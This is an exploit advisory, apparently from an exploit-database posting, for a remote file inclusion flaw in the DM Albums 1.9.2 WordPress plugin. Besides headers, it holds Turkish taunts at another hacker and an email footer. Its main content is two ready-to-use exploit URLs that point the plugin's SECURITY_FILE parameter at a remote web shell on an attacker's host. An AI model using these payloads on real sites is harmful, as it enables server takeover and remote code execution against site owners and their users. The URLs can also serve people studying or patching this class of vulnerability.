DM Albums version 1.9.2 and WordPress plugin suffer from a remote file inclusion vulnerability.
b784aa497bd6b2055a69418794ed5b13c4b7408ca6b4b8d6a81f3dc90357e0f1
#############################################################################################
[+] DM Albums 1.9.2 & WordPress Plug-in Remote File Include Vulnerability
[+] Author : Septemb0x
[+] www.Cyber-Warrior.Org - Information Technology's World
[+] Greetz : BARCOD3 And All Friends...
[+] Dork : Yok Dork Mork :D
[+] Download Script : http://www.dutchmonkey.com/?file=/products/dm-albums/download_form.html
[+] Product Site : http://www.dutchmonkey.com
[+] Wp Plug-in : http://wordpress.org/extend/plugins/dm-albums/
#############################################################################################
[+] NORMAL EXPLOIT;
[+] http://[sitename]/[wppath]/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://attackersite/shell.php
[+] WORDPRESS EXPLOIT;
[+] http://[sitename]/[wppath]/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://attackersite/shell.php
#############################################################################################
< ---- Note ---- >
H....R;
Sen çok üstün zekaya sahip birisin,
emin olbilirsin, :D
Sql injection ile domain hackleyebilen tek lamersin, :D
ASP'de Rfi Bulmakta Birebirsin,
Ama Gördüðüm En hýyar Lamersin :D
Bu Kafiyelerde Bi Tarafýna Girsin ;)
Lol H....R :D
< ---- Note Finished ---- >
_________________________________________________________________
Teker teker mi, yoksa hepsi birden mi? Arkadaþlarýnýzla ilgili güncel bilgileri tek bir yerden edinin.
http://www.microsoft.com/turkiye/windows/windowslive/products/social-network-connector.aspx